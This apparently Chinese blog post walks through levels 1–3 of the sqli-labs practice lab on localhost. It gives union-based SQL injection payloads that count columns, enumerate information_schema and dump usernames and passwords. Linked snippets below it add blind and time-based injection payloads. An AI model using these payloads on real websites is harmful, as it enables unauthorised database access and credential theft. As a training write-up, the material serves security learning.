sqli-labs(一到三)

最新推荐文章于 2024-02-21 16:00:56 发布
最新推荐文章于 2024-02-21 16:00:56 发布
阅读量129 收藏
点赞数
文章标签: mysql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mentions/article/details/122873575
版权

目录

前注

第一关:get 单引号 - 字符型注入

第二关:get - 数字型

第三关:GET单引号变形字符型注入

前注

在开始之前我们需要先做一些准备工作,打开如下文件夹

用notepad打开index.php,添加如下两行,第一行是将我们构造的sql语句进行输出,第二行是换行,接下来我们就可以开始做题了。

一.less-01

mysql的基本用法

1.查库:select schema_name from information_schema.schemata

2.查表:select table_name from information_schema.tables where table_schema='security'

 3.查列:select column_name from information_schema.columns where table_name='users'

4.查字段:select username,password from security.users

 -------------------------------------------------------------------------------------------------------------------------------

第一关:get 单引号 - 字符型注入

1、经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1 and 1=2 --+

 
2、接着尝试在id后面加上’,发现页面回显不正常,表示可能存在SQL字符注入:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’

 3、输入–+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入:http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ --+

 4、利用 order by 来判断users表中有几列:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ order by 1
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ order by 4

由上图可知没有第四列
%23指#的编码(这个不太明白,有待学习)
4、将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位:
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,2,3 %23

在这里插入图片描述

 可以看到只有第2列和第3列的结果显示在页面上,说明有两个显位
5、然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息
(1)查询数据库名信息的语句
?id=-1’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述

 

(2)知道数据库名后拆解表:可以用limit一次列举出来,这里直接使用 group_concat函数
*mysql的数据库information_schema:系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息,常用的表:
SCHEMATA表:储存mysql所有数据库的基本信息,包括数据库

名,编码类型路径等,show databases的结果取之此表。

TABLES表:储存mysql中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表

COLUMNS表:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,猎德注释等。是show columns from schemaname.tablename的结果取之此表。

?id=-1’ union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users–+

在这里插入图片描述

第二关:get - 数字型

1、根据提示输入:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1

 我们发现MySQL的执行语句中id=1没有用单引号包住,由此可知为数字型(注入更加简单)
2、利用 order by 来判断users表中有几列:
?id=1 order by 1

?id=1 order by 4


可知该表有3列数据
3、将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位:
?id=-1’ union select 1,2,3 %23

 可以看到只有第2列和第3列的结果显示在页面上,说明有两个显位
4、然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息:
(1)查询数据库名信息的语句:
?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

(2)拆解表:
?id=-1 union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users–+ 

第三关:GET单引号变形字符型注入

1.向页面输入?id=1’ --+页面显示不正常:
?id=1’ --+

 但是输入 ?id=1’) --+ 页面回显正常,说明此处是字符型注入,而且是以 (’’)的方式闭合字符串的:

在这里插入图片描述

 2.接着使用order by 判断表中有3列数据:
?id=1’) order by 4 --+
(在?id后面加了’),就已经和前面的(‘匹配了,所以要把最后的’)注释掉)

在这里插入图片描述

3.接着使用联合查询,union select 1,2,3 判断页面是否有显示位 :
?id=-1’) union select 1,2,3 %23

在这里插入图片描述 可以看到只有第2列和第3列的结果显示在页面上,说明有两个显位
4、然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息:
(1)查询数据库名信息的语句:
?id=-1’) union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述

(2)拆解表:
?id=-1 ')union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users --+

在这里插入图片描述 

 

 

 

 

 

RSA.
关注
SQLI DUMB SERIES-1
weixin_33738578的博客
03-01 3012
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 结果:   现在可知,“ ' ”并没有被过滤,因此...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQL注入】靶场SQLI DUMB SERIES-24通过二次注入重置用户密码
开水的博客
02-21 240
先使用已知信息admin/admin登录进去查下题,发现可以修改密码。第步,进入修改密码界面,随机输入一个旧密码,然后将需要重置的密码。第一步,注册一个新用户:admin’#/123456。,因此注释符#后面的内容都被注释,导致我们不需要知道。第二步,登录刚刚注册的admin’#用户。用户的密码,即可重置。
SQLI DUMB SERIES-11
weixin_34324081的博客
04-10 286
(1)检测构造方式 由此看出输入的用户名以及密码都被一对单引号所包含。 方法一: (2) 模拟真实环境,以用户的身份登录。 (3)用burp抓包。开启抓包,输入用户名和密码,会自动跳到这个页面,右键,点击send to repeater. (4)打开burp的repeater页面,修改post参数,测试是否存在报错注入。 说明存在报错型注入。 (5)可用extr...
SQLI DUMB SERIES-2
weixin_34290096的博客
03-01 670
less2 同Less1相同,存在注入点 输入 ?id=1' 说明我们输入的数据被原封不动的带入了,无需要在1后面加单引号 (1)爆字段 ?id=1 order by 4 字段为3. (2)用union联合查询 ?id=-1 union select 1,version(),database() ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs-maste 靶场的下载, phpStudy 下载
最新发布
09-13
php 环境,sqlmap 注入测试项目:Sqli-labs-maste 一步到位
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs(php7.3以上可运行)
01-29
总结来说,"sqli-labs"是一个宝贵的资源,对于想要深入了解SQL注入及其防护的人来说,它提供了一个理想的实践平台。在PHP7.3及以上版本的环境中,你可以更安全地探索这个主题,提高自己的安全技能,并为未来的项目...
SQLI DUMB SERIES-5
weixin_34179762的博客
03-12 623
less5 (1)输入单引号,回显错误,说明存在注入点。输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了;可以使用报错注入,有两种方式 (3)双注入查询 参考资料:http://www.2cto.com/article/201303/192718.html 简单的说,使用聚合函数进行双注入查询时...
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
SQLI DUMB SERIES-10
imomoe的博客
09-24 456
第十关的步骤与第九关相同 可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名 ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+ //猜表名 ?id=1' and if ((ascii(substr((select column_name from information_schema....
SQLi-Labs 学习笔记(Less 1-10)
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
[转]sqli-labs攻关1(错误型注入、双查询注入)(转载请删除括号里的内容)
05-02 266
前言 为了更好的学习和练习有关SQL注入的知识,于是我开启了sqli-labs的通关之路。。。。 为了方便学习查看,我在源码中的$sql下一句语句写以下php语句(就是输出拿到数据库查询的完整语句是怎么样的) echo "你的 sql 语句是:".$sql."<br>"; 在开始注入之前,我学习了下面这些相关sql注入基础知识。 sql注入基础知识 1.判断是...
SQLI DUMB SERIES-6
weixin_34273479的博客
03-12 258
less6 输入 ?id=1" 说明双引号未被过滤,输入的id被一对双引号所包围,存在注入点,可以闭合双引号。 而输入正常时 情况和less5相同,因此注入同less5。 转载于:https://www.cnblogs.com/momoli/p/10515723.html...
SQLI DUMB SERIES-4
weixin_33725807的博客
03-02 182
less4 输入单引号发现回显正常,说明单引号被过滤了,输入双引号: ?id=1" 说明输入的Id被一对双引号和圆括号包围,因此闭合双引号和圆括号就行,其他方法跟less1差不多 例如:union查询表名 ?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables%2...
SQLI DUMB SERIES-9&&10
weixin_33936401的博客
04-09 301
第五关、第八关以及第九关、第十关都是使用盲注,除了第五关说的双注入外,也可使用时间注入法 (1)无论输入啥,都回显相同 (2) ?id=1' and sleep(3) --+ 发现有明显延迟,说明可以使用时间注入, ?id=1' and if(length(database())=8 , sleep(5), 1) --+ 从1尝试到8发现有明显延迟,说明...
SQLI DUMB SERIES-8
imomoe的博客
09-23 787
SQLI DUMB SERIES-8思路 ?id=1'--+ 构造闭合发现没有回显 则我们使用盲注 盲注分为几种 布尔型盲注 Length() //返回字符串长度 Substr() //取字符串 用法同下 mid() //mid(ABC,1,2)意为从ABC中的第一个字符开始取 取两个字符 则返回值为AB left() //left(ABC,2)取字符串左边的几位 返回值为AB...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值